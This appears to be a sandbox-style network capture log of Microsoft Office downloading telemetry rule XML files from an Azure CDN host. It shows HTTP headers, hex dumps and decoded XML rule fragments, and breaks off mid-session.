                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T005959Z-1746fd949bdkw94lhC1EWRxuz400000000qg000000004r5f
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:59 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    2192.168.2.64970413.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:59 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 00:59:59 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 2160
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 115d5b31-c01e-0046-4bcb-452db9000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T005959Z-1746fd949bd7wvgbhC1EWR0rgs00000000hg0000000030c2
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:59 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    3192.168.2.64970113.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:59 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 00:59:59 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 3788
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: e6e3c96a-a01e-0032-07d4-431949000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T005959Z-174f7845968jrjrxhC1EWRmmrs00000016x000000000635c
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:59 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    4192.168.2.64970513.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:59 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 00:59:59 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 408
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 44a2812f-d01e-0028-1207-427896000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T005959Z-174f7845968j6t2phC1EWRcfe800000016t000000000mwas
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:59 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    5192.168.2.64970213.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:59 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 00:59:59 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 450
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: c4831996-901e-0016-39ce-45efe9000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T005959Z-1746fd949bdkw94lhC1EWRxuz400000000hg00000000bkw9
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 00:59:59 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    6192.168.2.64970713.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:01 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:01 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 896d1f20-701e-0001-29ee-44b110000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010001Z-174f7845968px8v7hC1EWR08ng00000016z000000000ba3e
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:01 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    7192.168.2.64970613.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:01 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:01 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 474
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 4628c04c-d01e-0017-18cc-45b035000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010001Z-1746fd949bdlqd7fhC1EWR6vt000000000p000000000c96t
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:01 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    8192.168.2.64970813.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:01 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:01 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 471
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: e8c785f0-901e-0048-4ed4-43b800000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010001Z-174f7845968nxc96hC1EWRspw800000016hg000000002ysg
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:02 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    9192.168.2.64971013.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:01 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:02 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 467
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 8361aa46-901e-008f-73ef-4467a6000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010002Z-174f7845968swgbqhC1EWRmnb400000016z0000000001k3w
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:02 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    10192.168.2.64970913.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:01 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:02 GMT
